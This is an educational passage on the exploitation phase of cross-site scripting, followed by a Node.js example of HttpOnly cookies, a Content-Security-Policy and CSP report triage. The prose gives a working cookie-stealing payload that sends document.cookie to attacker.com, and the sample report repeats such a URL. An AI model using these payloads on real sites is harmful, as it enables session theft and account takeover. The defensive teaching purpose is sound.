The Exploitation Phase

Once malicious code executes in a victim's browser, the exploitation phase begins. The injected script runs with full access to the page's origin, enabling a range of malicious activity. Cookie theft is one of the most common exploitation goals. A simple payload such as new Image().src='http://attacker.com/steal?cookie='+document.cookie sends the victim's cookies to an attacker-controlled server; only cookies not flagged HttpOnly are exposed this way, which is why session cookies should carry that flag. With a session cookie in hand, the attacker can impersonate the victim and access their account.

Beyond cookie theft, XSS payloads can perform any action the victim could perform on the website. This includes reading sensitive information from the page, modifying page content, submitting forms, making API calls, or redirecting to phishing sites. Sophisticated attacks might inject keyloggers to capture passwords, use the victim's browser as a proxy for further attacks, or exploit browser vulnerabilities for system compromise. The BeEF (Browser Exploitation Framework) demonstrates the extensive control attackers can achieve through XSS, turning victim browsers into remotely controlled zombies.
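Two server-side defences against the image-beacon cookie theft described above, as an added Node.js example that is not part of the original text: an HttpOnly session cookie keeps the value out of document.cookie, and a Content-Security-Policy both blocks the beacon and produces a violation report that a defender can triage. The host names, report shape and the triageCspReport helper are assumptions for illustration.

```javascript
// Added example, not from the original text: Node.js helpers showing two
// defences against the cookie-stealing beacon described above. Host names and
// the report shape are assumptions for illustration.

// Headers for a login response. HttpOnly keeps the session id out of
// document.cookie; the CSP confines images and fetches to the site's own
// origin and asks the browser to POST anything else to /csp-report.
function buildSecurityHeaders(sessionId) {
  return {
    'Set-Cookie': `session=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Strict`,
    'Content-Security-Policy':
      "default-src 'self'; img-src 'self'; connect-src 'self'; report-uri /csp-report",
  };
}

// Directives a beacon (new Image().src, fetch, XMLHttpRequest) would violate.
const BEACON_DIRECTIVES = new Set(['img-src', 'connect-src']);
// Query parameter names that suggest session material is being carried off.
const SENSITIVE_PARAMS = /[?&](cookie|session|sessionid|token)=/i;

// Triage one CSP violation report (the JSON body the browser posts).
// Returns 'high' for a beacon carrying cookie-like data to another host,
// 'medium' for any other beacon to another host, 'low' otherwise.
function triageCspReport(body) {
  let report;
  try { report = JSON.parse(body)['csp-report']; } catch { return 'low'; }
  if (!report) return 'low';
  const directive = String(report['effective-directive'] || report['violated-directive'] || '').split(' ')[0];
  const blocked = String(report['blocked-uri'] || '');
  let blockedHost = '', pageHost = '';
  try { blockedHost = new URL(blocked).host; } catch { /* 'inline', 'data', ... */ }
  try { pageHost = new URL(String(report['document-uri'])).host; } catch { /* ignore */ }
  if (!BEACON_DIRECTIVES.has(directive) || !blockedHost || blockedHost === pageHost) return 'low';
  return SENSITIVE_PARAMS.test(blocked) ? 'high' : 'medium';
}

// Constructed sample report, shaped like what browsers POST to report-uri.
const SAMPLE_REPORT = JSON.stringify({
  'csp-report': {
    'document-uri': 'https://shop.example/account',
    'violated-directive': 'img-src',
    'effective-directive': 'img-src',
    'blocked-uri': 'http://attacker.example/steal?cookie=session%3Dabc123',
  },
});
```

Browsers differ in how much of a cross-origin blocked URI they include in reports, so the 'medium' tier (any beacon to a foreign host) is the one to rely on for alerting.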